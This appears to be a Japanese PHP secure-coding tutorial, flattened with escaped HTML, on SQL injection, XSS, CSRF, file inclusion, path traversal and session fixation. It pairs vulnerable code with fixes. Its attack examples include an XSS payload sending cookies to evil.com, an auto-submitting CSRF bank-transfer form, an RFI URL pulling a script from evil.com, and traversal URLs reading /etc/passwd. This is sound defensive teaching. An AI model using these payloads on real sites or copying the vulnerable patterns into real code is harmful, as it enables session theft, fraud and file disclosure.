$mysqli = new mysqli('localhost', 'username', 'password', 'database');\n\n\/\/ \u30d7\u30ea\u30da\u30a2\u30fc\u30c9\u30b9\u30c6\u30fc\u30c8\u30e1\u30f3\u30c8\u306e\u6e96\u5099\n$stmt = $mysqli->prepare(\"SELECT * FROM users WHERE username = ?\");\n\n\/\/ \u30d1\u30e9\u30e1\u30fc\u30bf\u306e\u30d0\u30a4\u30f3\u30c9\n$stmt->bind_param(\"s\", $_POST['username']); \/\/ \"s\"\u306f\u6587\u5b57\u5217\u578b\u3092\u610f\u5473\u3059\u308b\n\n\/\/ \u30af\u30a8\u30ea\u306e\u5b9f\u884c\n$stmt->execute();\n\n\/\/ \u7d50\u679c\u306e\u53d6\u5f97\n$result = $stmt->get_result();\n$user = $result->fetch_assoc();\n<\/pre>\n\n\n\n\u305d\u306e\u4ed6\u306e\u9632\u5fa1\u7b56<\/h4>\n\n\n\n
\n
\u30af\u30ed\u30b9\u30b5\u30a4\u30c8\u30b9\u30af\u30ea\u30d7\u30c6\u30a3\u30f3\u30b0(XSS) \u2013 \u4e0d\u6b63\u306a\u30b9\u30af\u30ea\u30d7\u30c8\u5b9f\u884c\u3092\u9632\u3050<\/h3>\n\n\n\n
XSS\u306e\u7a2e\u985e\u3068\u653b\u6483\u30b7\u30ca\u30ea\u30aa<\/h4>\n\n\n\n
\n
\/\/ \u8106\u5f31\u306a\u30b3\u30fc\u30c9 echo \"\u691c\u7d22\u7d50\u679c: \" . $_GET['query'];<\/code> \u653b\u6483\u4f8b: https:\/\/example.com\/search.php?query=<script>document.location='https:\/\/evil.com\/steal.php?cookie='+document.cookie<\/script><\/code><\/li>\n\n\n\n\/\/ \u8106\u5f31\u306a\u30b3\u30fc\u30c9 $comment = $_POST['comment']; $stmt = $db->prepare(\"INSERT INTO comments (comment) VALUES (?)\"); $stmt->execute([$comment]); \/\/ \u5f8c\u3067\u8868\u793a\u3059\u308b\u969b $comments = $db->query(\"SELECT comment FROM comments\")->fetchAll(); foreach ($comments as $comment) { echo \"<div>\" . $comment['comment'] . \"<\/div>\"; \/\/ \u30a8\u30b9\u30b1\u30fc\u30d7\u3057\u3066\u3044\u306a\u3044 }<\/code><\/li>\n\n\n\n\/\/ \u8106\u5f31\u306aJavaScript\u30b3\u30fc\u30c9 document.getElementById(\"greeting\").innerHTML = \"\u3053\u3093\u306b\u3061\u306f\u3001\" + location.hash.substring(1);<\/code><\/li>\n<\/ol>\n\n\n\nXSS\u5bfe\u7b56\u306e\u5b9f\u88c5\u65b9\u6cd5<\/h4>\n\n\n\n
1. HTML\u306e\u51fa\u529b\u30a8\u30b9\u30b1\u30fc\u30d7<\/h5>\n\n\n\n
\/\/ \u5b89\u5168\u306a\u30b3\u30fc\u30c9\necho \"\u691c\u7d22\u7d50\u679c: \" . htmlspecialchars($_GET['query'], ENT_QUOTES, 'UTF-8');\n<\/pre>\n\n\n\n
htmlspecialchars<\/code>\u95a2\u6570\u306f\u3001HTML\u306e\u7279\u6b8a\u6587\u5b57\uff08<<\/code>, ><\/code>, &<\/code>, \"<\/code>, '<\/code>\uff09\u3092\u30a8\u30f3\u30c6\u30a3\u30c6\u30a3\u306b\u5909\u63db\u3057\u3001\u30b9\u30af\u30ea\u30d7\u30c8\u304c\u5b9f\u884c\u3055\u308c\u306a\u3044\u3088\u3046\u306b\u3057\u307e\u3059\u3002<\/p>\n\n\n\n2. \u30b3\u30f3\u30c6\u30ad\u30b9\u30c8\u306b\u5fdc\u3058\u305f\u30a8\u30b9\u30b1\u30fc\u30d7<\/h5>\n\n\n\n
\/\/ HTML\u30b3\u30f3\u30c6\u30ad\u30b9\u30c8\n$safeHtml = htmlspecialchars($input, ENT_QUOTES, 'UTF-8');\n\n\/\/ JavaScript\u30b3\u30f3\u30c6\u30ad\u30b9\u30c8\n$safeJs = json_encode($input);\necho \"<script>var userInput = \" . $safeJs . \";<\/script>\";\n\n\/\/ URL\u30b3\u30f3\u30c6\u30ad\u30b9\u30c8\n$safeUrl = urlencode($input);\necho \"<a href=\\\"https:\/\/example.com\/?q={$safeUrl}\\\">\u30ea\u30f3\u30af<\/a>\";\n<\/pre>\n\n\n\n3. Content Security Policy (CSP)\u306e\u8a2d\u5b9a<\/h5>\n\n\n\n
\/\/ CSP\u30d8\u30c3\u30c0\u30fc\u306e\u8a2d\u5b9a\u4f8b\nheader(\"Content-Security-Policy: default-src 'self'; script-src 'self' https:\/\/trusted-cdn.com\");\n<\/pre>\n\n\n\n
4. PHP\u30d5\u30ec\u30fc\u30e0\u30ef\u30fc\u30af\u306e\u6d3b\u7528<\/h5>\n\n\n\n
\/\/ Laravel\u306eblade\u30c6\u30f3\u30d7\u30ec\u30fc\u30c8\uff08\u81ea\u52d5\u30a8\u30b9\u30b1\u30fc\u30d7\uff09\n{{ $userInput }} \/\/ \u81ea\u52d5\u7684\u306bhtmlspecialchars\u304c\u9069\u7528\u3055\u308c\u308b\n\n\/\/ \u751f\u306eHTML\u3092\u51fa\u529b\u3057\u305f\u3044\u5834\u5408\uff08\u4fe1\u983c\u3067\u304d\u308b\u5165\u529b\u306e\u307f\u4f7f\u7528\uff09\n{!! $trustedHtml !!}\n<\/pre>\n\n\n\n5. \u5165\u529b\u306e\u30d0\u30ea\u30c7\u30fc\u30b7\u30e7\u30f3\u3068\u30b5\u30cb\u30bf\u30a4\u30ba<\/h5>\n\n\n\n
\/\/ \u5165\u529b\u306e\u30d0\u30ea\u30c7\u30fc\u30b7\u30e7\u30f3\u3068\u30b5\u30cb\u30bf\u30a4\u30ba\n$email = filter_input(INPUT_POST, 'email', FILTER_VALIDATE_EMAIL);\nif (!$email) {\n \/\/ \u4e0d\u6b63\u306a\u5165\u529b\u51e6\u7406\n}\n<\/pre>\n\n\n\n\u30af\u30ed\u30b9\u30b5\u30a4\u30c8\u30ea\u30af\u30a8\u30b9\u30c8\u30d5\u30a9\u30fc\u30b8\u30a7\u30ea(CSRF) \u2013 \u4e0d\u6b63\u306a\u30ea\u30af\u30a8\u30b9\u30c8\u5bfe\u7b56<\/h3>\n\n\n\n
CSRF\u306e\u4ed5\u7d44\u307f\u3068\u653b\u6483\u30b7\u30ca\u30ea\u30aa<\/h4>\n\n\n\n
\n
\u653b\u6483\u4f8b<\/h5>\n\n\n\n
<html>\n <body>\n <h1>\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u4e2d\uff01\u30af\u30ea\u30c3\u30af\u3057\u3066\u5fdc\u52df\uff01<\/h1>\n <!-- \u898b\u3048\u306a\u3044\u30d5\u30a9\u30fc\u30e0\u304c\u81ea\u52d5\u9001\u4fe1\u3055\u308c\u308b -->\n <form action=\"https:\/\/bank.example.com\/transfer.php\" method=\"POST\" id=\"csrf-form\">\n <input type=\"hidden\" name=\"recipient\" value=\"attacker\">\n <input type=\"hidden\" name=\"amount\" value=\"1000000\">\n <\/form>\n <script>document.getElementById(\"csrf-form\").submit();<\/script>\n <\/body>\n<\/html>\n<\/pre>\n\n\n\n
CSRF\u5bfe\u7b56\u306e\u5b9f\u88c5\u65b9\u6cd5<\/h4>\n\n\n\n
1. CSRF\u30c8\u30fc\u30af\u30f3\u3092\u4f7f\u7528\u3059\u308b<\/h5>\n\n\n\n
\/\/ \u30bb\u30c3\u30b7\u30e7\u30f3\u958b\u59cb\uff08\u5fc5\u305a\u6700\u521d\u306b\uff09\nsession_start();\n\n\/\/ CSRF\u30c8\u30fc\u30af\u30f3\u306e\u751f\u6210\nif (!isset($_SESSION['csrf_token'])) {\n $_SESSION['csrf_token'] = bin2hex(random_bytes(32));\n}\n\n\/\/ \u30d5\u30a9\u30fc\u30e0\u306b\u30c8\u30fc\u30af\u30f3\u3092\u57cb\u3081\u8fbc\u3080\nfunction csrf_token_tag() {\n return '<input type=\"hidden\" name=\"csrf_token\" value=\"' . $_SESSION['csrf_token'] . '\">';\n}\n\n\/\/ POST\u30ea\u30af\u30a8\u30b9\u30c8\u3067\u306e\u30c8\u30fc\u30af\u30f3\u691c\u8a3c\nfunction csrf_check() {\n if ($_SERVER['REQUEST_METHOD'] === 'POST') {\n if (!isset($_POST['csrf_token']) || $_POST['csrf_token'] !== $_SESSION['csrf_token']) {\n \/\/ \u30c8\u30fc\u30af\u30f3\u304c\u7121\u52b9\u306a\u5834\u5408\u306f\u30a8\u30e9\u30fc\u51e6\u7406\n http_response_code(403);\n die('\u4e0d\u6b63\u306a\u30ea\u30af\u30a8\u30b9\u30c8\u3067\u3059');\n }\n }\n}\n\n\/\/ \u4f7f\u7528\u4f8b - \u30d5\u30a9\u30fc\u30e0\u8868\u793a\n?>\n<form method=\"POST\" action=\"process.php\">\n <?php echo csrf_token_tag(); ?>\n <!-- \u30d5\u30a9\u30fc\u30e0\u306e\u5185\u5bb9 -->\n <input type=\"text\" name=\"username\">\n <button type=\"submit\">\u9001\u4fe1<\/button>\n<\/form>\n\n<?php\n\/\/ \u4f7f\u7528\u4f8b - \u30ea\u30af\u30a8\u30b9\u30c8\u51e6\u7406\ncsrf_check(); \/\/ \u30ea\u30af\u30a8\u30b9\u30c8\u51e6\u7406\u306e\u6700\u521d\u306b\u547c\u3073\u51fa\u3059\n\/\/ \u691c\u8a3c\u306b\u6210\u529f\u3057\u305f\u3089\u51e6\u7406\u3092\u7d9a\u884c\n\/\/ ...\n<\/pre>\n\n\n\n2. SameSite Cookie\u5c5e\u6027\u306e\u8a2d\u5b9a<\/h5>\n\n\n\n
\/\/ \u30bb\u30c3\u30b7\u30e7\u30f3Cookie\u306bSameSite\u5c5e\u6027\u3092\u8a2d\u5b9a\nsession_start();\n$params = session_get_cookie_params();\nsetcookie(\n session_name(),\n session_id(),\n [\n 'expires' => $params['lifetime'] ? time() + $params['lifetime'] : 0,\n 'path' => $params['path'],\n 'domain' => $params['domain'],\n 'secure' => true, \/\/ HTTPS\u3067\u306e\u307fCookie\u3092\u9001\u4fe1\n 'httponly' => true, \/\/ JavaScript\u304b\u3089\u306e\u30a2\u30af\u30bb\u30b9\u3092\u7981\u6b62\n 'samesite' => 'Lax' \/\/ \u540c\u4e00\u30b5\u30a4\u30c8\u304b\u3089\u306e\u30ea\u30af\u30a8\u30b9\u30c8\u306e\u307fCookie\u3092\u9001\u4fe1\n ]\n);\n<\/pre>\n\n\n\n
3. PHP\u30d5\u30ec\u30fc\u30e0\u30ef\u30fc\u30af\u3067\u306eCSRF\u5bfe\u7b56<\/h5>\n\n\n\n
Laravel<\/h6>\n\n\n\n
\/\/ \u30d5\u30a9\u30fc\u30e0\u306bCSRF\u30c8\u30fc\u30af\u30f3\u3092\u542b\u3081\u308b\n<form method=\"POST\" action=\"\/profile\">\n @csrf\n <!-- \u30d5\u30a9\u30fc\u30e0\u306e\u5185\u5bb9 -->\n<\/form>\n\n\/\/ JavaScript\u30ea\u30af\u30a8\u30b9\u30c8\u7528\u306e\u8a2d\u5b9a\n<meta name=\"csrf-token\" content=\"{{ csrf_token() }}\">\n<script>\n $.ajaxSetup({\n headers: {\n 'X-CSRF-TOKEN': $('meta[name=\"csrf-token\"]').attr('content')\n }\n });\n<\/script>\n<\/pre>\n\n\n\nSymfony<\/h6>\n\n\n\n
\/\/ \u30d5\u30a9\u30fc\u30e0\u306bCSRF\u30c8\u30fc\u30af\u30f3\u3092\u542b\u3081\u308b\n$form = $this->createFormBuilder()\n ->add('task', TextType::class)\n ->add('save', SubmitType::class)\n ->getForm();\n\/\/ Symfony\u30d5\u30a9\u30fc\u30e0\u306f\u81ea\u52d5\u7684\u306bCSRF\u30c8\u30fc\u30af\u30f3\u3092\u542b\u3081\u308b\n<\/pre>\n\n\n\nCSRF\u5bfe\u7b56\u306e\u30d9\u30b9\u30c8\u30d7\u30e9\u30af\u30c6\u30a3\u30b9<\/h4>\n\n\n\n
\n
\/\/ \u6709\u52b9\u671f\u9650\u4ed8\u304d\u30c8\u30fc\u30af\u30f3\u306e\u4f8b\n$_SESSION['csrf_token'] = bin2hex(random_bytes(32));\n$_SESSION['csrf_token_time'] = time();\n\n\/\/ \u691c\u8a3c\u6642\nif (time() - $_SESSION['csrf_token_time'] > 3600) { \/\/ 1\u6642\u9593\u306e\u5236\u9650\n \/\/ \u30c8\u30fc\u30af\u30f3\u671f\u9650\u5207\u308c\n}\n<\/pre>\n\n\n\n\u30d5\u30a1\u30a4\u30eb\u30a4\u30f3\u30af\u30eb\u30fc\u30c9\u8106\u5f31\u6027 \u2013 \u4e0d\u6b63\u306a\u30d5\u30a1\u30a4\u30eb\u8aad\u307f\u8fbc\u307f\u3092\u9632\u3050<\/h3>\n\n\n\n
include<\/code>\u3001require<\/code>\u3001include_once<\/code>\u3001require_once<\/code>\u95a2\u6570\u306a\u3069\u3092\u4f7f\u7528\u3059\u308b\u969b\u306b\u3001\u30e6\u30fc\u30b6\u30fc\u306e\u5165\u529b\u5024\u3092\u9069\u5207\u306b\u691c\u8a3c\u305b\u305a\u306b\u30d5\u30a1\u30a4\u30eb\u30d1\u30b9\u3068\u3057\u3066\u4f7f\u7528\u3059\u308b\u3053\u3068\u3067\u767a\u751f\u3057\u307e\u3059\u3002\u3053\u306e\u8106\u5f31\u6027\u306f\u3001\u653b\u6483\u8005\u306b\u30b5\u30fc\u30d0\u30fc\u4e0a\u306e\u30d5\u30a1\u30a4\u30eb\u3078\u306e\u4e0d\u6b63\u30a2\u30af\u30bb\u30b9\u3084\u3001\u6700\u60aa\u306e\u5834\u5408\u30ea\u30e2\u30fc\u30c8\u30b3\u30fc\u30c9\u5b9f\u884c\u3092\u8a31\u3057\u3066\u3057\u307e\u3046\u6df1\u523b\u306a\u8105\u5a01\u3067\u3059\u3002<\/p>\n\n\n\n\u30d5\u30a1\u30a4\u30eb\u30a4\u30f3\u30af\u30eb\u30fc\u30c9\u8106\u5f31\u6027\u306e\u7a2e\u985e<\/h4>\n\n\n\n
\n
\u8106\u5f31\u306a\u30b3\u30fc\u30c9\u4f8b\u3068\u653b\u6483\u30b7\u30ca\u30ea\u30aa<\/h4>\n\n\n\n
\/\/ \u8106\u5f31\u306a\u30b3\u30fc\u30c9\u4f8b\n$page = $_GET['page'];\ninclude($page . '.php');\n<\/pre>\n\n\n\n
\u30ea\u30e2\u30fc\u30c8\u30d5\u30a1\u30a4\u30eb\u30a4\u30f3\u30af\u30eb\u30fc\u30c9 (RFI) \u306e\u4f8b<\/h5>\n\n\n\n
https:\/\/example.com\/index.php?page=http:\/\/evil.com\/malicious_script\n<\/pre>\n\n\n\n
allow_url_include<\/code>\u304c\u6709\u52b9\u306b\u306a\u3063\u3066\u3044\u308b\u3068\u3001\u5916\u90e8\u30b5\u30fc\u30d0\u30fc\u306e\u60aa\u610f\u306e\u3042\u308bPHP\u30b9\u30af\u30ea\u30d7\u30c8\u304c\u5b9f\u884c\u3055\u308c\u308b\u53ef\u80fd\u6027\u304c\u3042\u308a\u307e\u3059\u3002<\/p>\n\n\n\n\u30ed\u30fc\u30ab\u30eb\u30d5\u30a1\u30a4\u30eb\u30a4\u30f3\u30af\u30eb\u30fc\u30c9 (LFI) \u306e\u4f8b<\/h5>\n\n\n\n
https:\/\/example.com\/index.php?page=..\/..\/..\/etc\/passwd%00\n<\/pre>\n\n\n\n
\/etc\/passwd<\/code>\u306a\u3069\uff09\u3092\u8aad\u307f\u53d6\u308b\u53ef\u80fd\u6027\u304c\u3042\u308a\u307e\u3059\u3002PHP 5.3.4\u4ee5\u524d\u3067\u306fNULL\u30d0\u30a4\u30c8\uff08%00<\/code>\uff09\u3092\u4f7f\u3063\u3066\u30d5\u30a1\u30a4\u30eb\u540d\u306e\u672b\u5c3e\u306b\u8ffd\u52a0\u3055\u308c\u308b.php<\/code>\u3092\u7121\u52b9\u5316\u3067\u304d\u307e\u3057\u305f\u3002<\/p>\n\n\n\n\u30d5\u30a1\u30a4\u30eb\u30a4\u30f3\u30af\u30eb\u30fc\u30c9\u8106\u5f31\u6027\u3078\u306e\u5bfe\u7b56<\/h4>\n\n\n\n
1. \u30e6\u30fc\u30b6\u30fc\u5165\u529b\u3092\u30d5\u30a1\u30a4\u30eb\u30d1\u30b9\u306b\u76f4\u63a5\u4f7f\u7528\u3057\u306a\u3044<\/h5>\n\n\n\n
\/\/ \u5b89\u5168\u306a\u30b3\u30fc\u30c9\u4f8b - \u30de\u30c3\u30d4\u30f3\u30b0\u65b9\u5f0f\n$page_mapping = [\n 'home' => 'home.php',\n 'about' => 'about.php',\n 'contact' => 'contact.php'\n];\n\n$requested_page = $_GET['page'] ?? 'home';\n\nif (isset($page_mapping[$requested_page])) {\n include $page_mapping[$requested_page];\n} else {\n include $page_mapping['home']; \/\/ \u30c7\u30d5\u30a9\u30eb\u30c8\u30da\u30fc\u30b8\n}\n<\/pre>\n\n\n\n2. \u30db\u30ef\u30a4\u30c8\u30ea\u30b9\u30c8\u691c\u8a3c<\/h5>\n\n\n\n
\/\/ \u30db\u30ef\u30a4\u30c8\u30ea\u30b9\u30c8\u691c\u8a3c\n$allowed_pages = ['home', 'about', 'contact'];\n$requested_page = $_GET['page'] ?? 'home';\n\nif (in_array($requested_page, $allowed_pages)) {\n include $requested_page . '.php';\n} else {\n include 'home.php'; \/\/ \u30c7\u30d5\u30a9\u30eb\u30c8\u30da\u30fc\u30b8\n}\n<\/pre>\n\n\n\n3. \u30d1\u30b9\u6b63\u898f\u5316\u3068\u691c\u8a3c<\/h5>\n\n\n\n
\/\/ \u30d1\u30b9\u6b63\u898f\u5316\u3068\u691c\u8a3c\n$requested_page = $_GET['page'] ?? 'home';\n$page_file = $requested_page . '.php';\n\n\/\/ realpath()\u3067\u30d1\u30b9\u3092\u6b63\u898f\u5316\u3057\u3001\u610f\u56f3\u3057\u305f\u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u5185\u306b\u3042\u308b\u304b\u78ba\u8a8d\n$base_dir = realpath(__DIR__ . '\/pages\/');\n$requested_path = realpath($base_dir . '\/' . $page_file);\n\n\/\/ \u6307\u5b9a\u3057\u305f\u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u5916\u3078\u306e\u30a2\u30af\u30bb\u30b9\u3092\u9632\u6b62\nif ($requested_path && strpos($requested_path, $base_dir) === 0 && file_exists($requested_path)) {\n include $requested_path;\n} else {\n include $base_dir . '\/home.php'; \/\/ \u30c7\u30d5\u30a9\u30eb\u30c8\u30da\u30fc\u30b8\n}\n<\/pre>\n\n\n\n4. PHP\u8a2d\u5b9a\u3067\u306e\u5bfe\u7b56<\/h5>\n\n\n\n
php.ini<\/code>\u3067\u30d5\u30a1\u30a4\u30eb\u30a4\u30f3\u30af\u30eb\u30fc\u30c9\u95a2\u9023\u306e\u8a2d\u5b9a\u3092\u5b89\u5168\u306b\u69cb\u6210\u3057\u307e\u3059\uff1a<\/p>\n\n\n\n; \u30ea\u30e2\u30fc\u30c8\u30d5\u30a1\u30a4\u30eb\u306e\u30a4\u30f3\u30af\u30eb\u30fc\u30c9\u3092\u7121\u52b9\u5316\nallow_url_include = Off\n\n; \u53ef\u80fd\u3067\u3042\u308c\u3070\u30ea\u30e2\u30fc\u30c8\u30d5\u30a1\u30a4\u30eb\u306e\u30aa\u30fc\u30d7\u30f3\u3082\u7121\u52b9\u5316\nallow_url_fopen = Off\n\n; PHP\u30b9\u30af\u30ea\u30d7\u30c8\u306e\u30a2\u30af\u30bb\u30b9\u53ef\u80fd\u306a\u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u3092\u5236\u9650\nopen_basedir = \/path\/to\/web\/files\n<\/pre>\n\n\n\n
5. basename()\u95a2\u6570\u306e\u4f7f\u7528<\/h5>\n\n\n\n
basename()<\/code>\u95a2\u6570\u3092\u4f7f\u7528\u3059\u308b\u65b9\u6cd5\uff1a<\/p>\n\n\n\n\/\/ basename()\u3067\u30d1\u30b9\u90e8\u5206\u3092\u9664\u53bb\n$requested_page = basename($_GET['page'] ?? 'home');\ninclude 'pages\/' . $requested_page . '.php';\n<\/pre>\n\n\n\n
basename()<\/code>\u3060\u3051\u3067\u306f\u5b8c\u5168\u306a\u5bfe\u7b56\u306b\u306f\u306a\u3089\u306a\u3044\u305f\u3081\u3001\u4ed6\u306e\u65b9\u6cd5\u3068\u7d44\u307f\u5408\u308f\u305b\u3066\u4f7f\u7528\u3057\u3066\u304f\u3060\u3055\u3044\u3002<\/p>\n\n\n\n\u30d9\u30b9\u30c8\u30d7\u30e9\u30af\u30c6\u30a3\u30b9<\/h4>\n\n\n\n
\n
\u30d1\u30b9\u30c8\u30e9\u30d0\u30fc\u30b5\u30eb \u2013 \u4e0d\u6b63\u306a\u30d5\u30a1\u30a4\u30eb\u30a2\u30af\u30bb\u30b9\u3092\u9632\u3050\u6280\u8853<\/h3>\n\n\n\n
\u30d1\u30b9\u30c8\u30e9\u30d0\u30fc\u30b5\u30eb\u653b\u6483\u306e\u4ed5\u7d44\u307f<\/h4>\n\n\n\n
..\/<\/code>\uff09\u3092\u4f7f\u7528\u3057\u3066\u3001\u30a2\u30d7\u30ea\u30b1\u30fc\u30b7\u30e7\u30f3\u306e\u60f3\u5b9a\u5916\u306e\u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u306b\u79fb\u52d5\u3057\u3088\u3046\u3068\u3057\u307e\u3059\u3002\u4f8b\u3048\u3070\u3001\u4ee5\u4e0b\u306e\u3088\u3046\u306a\u30b3\u30fc\u30c9\u306f\u8106\u5f31\u6027\u3092\u542b\u3093\u3067\u3044\u307e\u3059\uff1a<\/p>\n\n\n\n\/\/ \u8106\u5f31\u306a\u30b3\u30fc\u30c9\u4f8b\n$file = $_GET['filename'];\ninclude(\"includes\/\" . $file);\n<\/pre>\n\n\n\n
https:\/\/example.com\/page.php?filename=..\/..\/..\/etc\/passwd\n<\/pre>\n\n\n\n
https:\/\/example.com\/page.php?filename=..%2F..%2F..%2Fetc%2Fpasswd\n<\/pre>\n\n\n\n
\u5b9f\u969b\u306e\u653b\u6483\u30b7\u30ca\u30ea\u30aa<\/h4>\n\n\n\n
\n
\/etc\/passwd<\/code>\u306a\u3069\u306e\u30b7\u30b9\u30c6\u30e0\u30d5\u30a1\u30a4\u30eb\u3078\u306e\u30a2\u30af\u30bb\u30b9<\/li>\n<\/ol>\n\n\n\n\u30d1\u30b9\u30c8\u30e9\u30d0\u30fc\u30b5\u30eb\u5bfe\u7b56\u306e\u5b9f\u88c5\u65b9\u6cd5<\/h4>\n\n\n\n
1. \u30d1\u30b9\u306e\u6b63\u898f\u5316\u3068\u691c\u8a3c<\/h5>\n\n\n\n
\/\/ \u30d1\u30b9\u306e\u6b63\u898f\u5316\u3068\u691c\u8a3c\nfunction safeIncludeFile($userFilename) {\n \/\/ \u30d9\u30fc\u30b9\u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u306e\u7d76\u5bfe\u30d1\u30b9\u3092\u53d6\u5f97\n $baseDir = realpath(__DIR__ . '\/includes\/');\n \n \/\/ \u30e6\u30fc\u30b6\u30fc\u6307\u5b9a\u306e\u30d5\u30a1\u30a4\u30eb\u30d1\u30b9\u3092\u7d50\u5408\u3057\u3001\u6b63\u898f\u5316\n $requestedPath = realpath($baseDir . '\/' . $userFilename);\n \n \/\/ \u30d1\u30b9\u304c\u5b58\u5728\u3057\u3001\u30d9\u30fc\u30b9\u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u5185\u306b\u53ce\u307e\u3063\u3066\u3044\u308b\u304b\u78ba\u8a8d\n if ($requestedPath && strpos($requestedPath, $baseDir) === 0 && file_exists($requestedPath)) {\n return $requestedPath;\n }\n \n return false; \/\/ \u5b89\u5168\u3067\u306a\u3044\u30d1\u30b9\u3084\u30d5\u30a1\u30a4\u30eb\u304c\u5b58\u5728\u3057\u306a\u3044\u5834\u5408\n}\n\n\/\/ \u4f7f\u7528\u4f8b\n$userFile = $_GET['filename'] ?? 'default.php';\n$safePath = safeIncludeFile($userFile);\n\nif ($safePath) {\n include($safePath);\n} else {\n die(\"\u6307\u5b9a\u3055\u308c\u305f\u30d5\u30a1\u30a4\u30eb\u306f\u8aad\u307f\u8fbc\u3081\u307e\u305b\u3093\");\n}\n<\/pre>\n\n\n\n\n
realpath()<\/code>\u95a2\u6570\u304c\u76f8\u5bfe\u30d1\u30b9\u8868\u8a18\uff08..\/<\/code>\uff09\u3092\u89e3\u6c7a\u3057\u3066\u7d76\u5bfe\u30d1\u30b9\u3092\u8fd4\u3059<\/li>\n\n\n\n2. \u30d5\u30a1\u30a4\u30eb\u540d\u306e\u30db\u30ef\u30a4\u30c8\u30ea\u30b9\u30c8\u691c\u8a3c<\/h5>\n\n\n\n
\/\/ \u30db\u30ef\u30a4\u30c8\u30ea\u30b9\u30c8\u691c\u8a3c\n$allowedFiles = [\n 'home.php', 'about.php', 'contact.php', 'services.php'\n];\n\n$userFile = $_GET['page'] ?? 'home.php';\n\nif (in_array($userFile, $allowedFiles)) {\n include('includes\/' . $userFile);\n} else {\n include('includes\/home.php'); \/\/ \u30c7\u30d5\u30a9\u30eb\u30c8\u30da\u30fc\u30b8\n}\n<\/pre>\n\n\n\n3. \u30d5\u30a1\u30a4\u30eb\u62e1\u5f35\u5b50\u306e\u5236\u9650\u3068\u691c\u8a3c<\/h5>\n\n\n\n
\/\/ \u62e1\u5f35\u5b50\u306e\u691c\u8a3c\nfunction isAllowedExtension($filename) {\n $allowedExtensions = ['jpg', 'png', 'gif', 'pdf'];\n $extension = strtolower(pathinfo($filename, PATHINFO_EXTENSION));\n return in_array($extension, $allowedExtensions);\n}\n\n$userFile = $_GET['file'] ?? 'default.jpg';\n\n\/\/ basename()\u3067\u30d1\u30b9\u90e8\u5206\u3092\u9664\u53bb\u3057\u3001\u62e1\u5f35\u5b50\u3092\u691c\u8a3c\n$filename = basename($userFile);\nif (isAllowedExtension($filename)) {\n readfile('uploads\/' . $filename);\n} else {\n die(\"\u4e0d\u6b63\u306a\u30d5\u30a1\u30a4\u30eb\u5f62\u5f0f\u3067\u3059\");\n}\n<\/pre>\n\n\n\n4. \u76f4\u63a5\u306e\u30d5\u30a1\u30a4\u30eb\u30a2\u30af\u30bb\u30b9\u3092API\u3067\u62bd\u8c61\u5316<\/h5>\n\n\n\n
\/\/ API\u306b\u3088\u308b\u30d5\u30a1\u30a4\u30eb\u30a2\u30af\u30bb\u30b9\u306e\u62bd\u8c61\u5316\n$fileId = $_GET['id'] ?? '';\n\n\/\/ \u30c7\u30fc\u30bf\u30d9\u30fc\u30b9\u304b\u3089\u30d5\u30a1\u30a4\u30eb\u30d1\u30b9\u3092\u53d6\u5f97\uff08\u4f8b\uff09\n$stmt = $pdo->prepare(\"SELECT filepath FROM allowed_files WHERE id = ? AND user_id = ?\");\n$stmt->execute([$fileId, $currentUserId]);\n$file = $stmt->fetch();\n\nif ($file && file_exists($file['filepath'])) {\n readfile($file['filepath']);\n} else {\n http_response_code(404);\n echo \"\u30d5\u30a1\u30a4\u30eb\u304c\u898b\u3064\u304b\u308a\u307e\u305b\u3093\";\n}\n<\/pre>\n\n\n\n\u30d1\u30b9\u30c8\u30e9\u30d0\u30fc\u30b5\u30eb\u5bfe\u7b56\u306e\u30d9\u30b9\u30c8\u30d7\u30e9\u30af\u30c6\u30a3\u30b9<\/h4>\n\n\n\n
\n
open_basedir = \/path\/to\/web\/files<\/code><\/li>\n<\/ol>\n\n\n\n\u30bb\u30c3\u30b7\u30e7\u30f3\u7ba1\u7406\u306e\u8106\u5f31\u6027 \u2013 \u30bb\u30c3\u30b7\u30e7\u30f3\u30cf\u30a4\u30b8\u30e3\u30c3\u30af\u5bfe\u7b56<\/h3>\n\n\n\n
\u30bb\u30c3\u30b7\u30e7\u30f3\u95a2\u9023\u306e\u8106\u5f31\u6027\u3068\u653b\u6483\u624b\u6cd5<\/h4>\n\n\n\n
1. \u30bb\u30c3\u30b7\u30e7\u30f3\u30cf\u30a4\u30b8\u30e3\u30c3\u30af<\/h5>\n\n\n\n
\n
2. \u30bb\u30c3\u30b7\u30e7\u30f3\u56fa\u5b9a\u653b\u6483<\/h5>\n\n\n\n
\u653b\u6483\u30d5\u30ed\u30fc:\n1. \u653b\u6483\u8005\u304cWeb\u30b5\u30a4\u30c8\u306b\u30a2\u30af\u30bb\u30b9\u3057\u3066\u30bb\u30c3\u30b7\u30e7\u30f3ID\u3092\u53d6\u5f97\n2. \u653b\u6483\u8005\u304c\u88ab\u5bb3\u8005\u306b\u7279\u5b9a\u306e\u30bb\u30c3\u30b7\u30e7\u30f3ID\u3092\u6301\u3064\u30ea\u30f3\u30af\u3092\u9001\u4fe1\n3. \u88ab\u5bb3\u8005\u304c\u305d\u306e\u30ea\u30f3\u30af\u3092\u4f7f\u3063\u3066\u30ed\u30b0\u30a4\u30f3\n4. \u653b\u6483\u8005\u306f\u88ab\u5bb3\u8005\u3068\u540c\u3058\u30bb\u30c3\u30b7\u30e7\u30f3ID\u3092\u6301\u3064\u305f\u3081\u3001\u8a8d\u8a3c\u6e08\u307f\u30bb\u30c3\u30b7\u30e7\u30f3\u306b\u4fbf\u4e57\u3067\u304d\u308b\n<\/pre>\n\n\n\n